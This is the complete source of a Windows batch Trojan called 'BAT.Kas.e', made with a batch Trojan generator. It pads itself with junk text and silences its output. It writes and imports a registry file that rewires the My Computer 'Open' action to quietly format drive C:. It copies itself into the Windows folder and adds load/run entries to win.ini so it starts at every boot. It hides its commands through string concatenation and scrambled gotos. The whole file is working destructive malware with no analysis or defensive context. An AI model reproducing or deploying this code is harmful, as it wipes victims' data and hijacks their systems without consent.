@echo off
REM Name of the Trojan Horse: BAT.Kas.e
REM Author of the Trojan Horse: [ka$]
REM generated with BATCH TROJAN GENERATOR 0.07
ctty NUL
yatcdqfrpadwfraasrqodjbckeaejvoqcprecdpzggyyocmsnlsjpmgcrpwghrhqrevxidrnnvanmytcmcivgfsouuukgqyccpvjr
zotvnysypbtykdaaxpzelkqdzrosoincwlhpcknugneigtyvvbzfkkaxaqpzxzmldnqgkczyfgybhwrnhfahllolzzrgkmfsbwhdd
qditnmnkdeamhrvidhqewjzulusxruscryvejlcifoguklgvfglxmeoxnfkycsidxnjuahhvsudkswzuglslyrknknrminlyzwvup
ojsjxorjmjxzyjaljxkstlulvlimadohuwutzkwnvvbztizctlidxqerctdeafhfnctpapgjkuxzxmpclmchccwewtbqwyhognmnb
ccauripltcpxklxgufbswxopfxlonsfdssqmvcmkavsrpfomplmdlmohzicynfggkjkatyhvgaqimdxtkvqrzojxdwpzxtjmcimxt
rsrgzmimareerqvwxonnvddceevrxzshcjbaamhyrmsuhreliwedmwzmfjhajczuyyzljtrjvzkcxxfeowwvcyanrpzbzzfpaclkh
kacgvicvlmlkhqnynvnimwsbtxeclnvdrxnurlqjnoqrsnditxzysawvqrxzqfperuceewqtfxfdwoonuuhhxllqszelkpqqohffz
oagsbooktrvuzufteisekkgirvvnwgruoqffpbsxelnyczkygljflafclcaqcqjgymxuadkcvsvjoesbrswxqkckzjoemuaysjorw
ekqtlcgzwxunzmmozqvioqeoclqxhmzrqmdznoswkuuugobqesblnowwzkxnczwzwlhowoysfbtoihuniatlerkxvskqrhmhhasmi
ibdspgueawqwjpilexhbdwhasadjbcvwdgohcaorzkpgnfcfjplblwlyoqckicojhrpikrxtmpxvhgvlonzhlbfkblqwojutclthh
xvivobblknzaykbweohopiepomyuuoomhjggmrhuhgtazgwovonghrsehsuruonvpombmeybozrwtacgrfzmrgwchmgaqgpcklxou
set bom=c:\regbomb.reg
echo>%bom% REGEDIT4
echo.>>%bom%
echo>>%bom% [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Open]
echo.>>%bom%
set rb=classes
echo >>%bom% [HKEY_LOCAL_MACHINE\SOFTWARE\%rb%\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Open\Command]
set fu=minimized
echo >>%bom% @="start /%fu% command /c echo y|format c: /q /u /autotest >nul"
echo.>>%bom%
set a=reg
set b=edit
set c=%a%%b%
%c%.exe %bom%
set mssd=%0
copy %mssd% %windir%\asd.bat
set wini=%windir%\win.ini
set ini=win
echo [%ini%dows] > %wini%
echo load=%windir%\asd.bat >> %wini%
echo run=%windir%\asd.bat >> %wini%
goto tafake
:tari
set uy=NullPort
goto tawei
:tafake
set uy=qu
goto tari
:tawei
set klklk=dkgf
set klklk=echo
goto klklk
set klklk=uirj
:klklk
set klk=dhhf
set klk=%klklk%ch
goto klk
set klk=ghj
:klk
%klk% %uy%=None >> %wini%
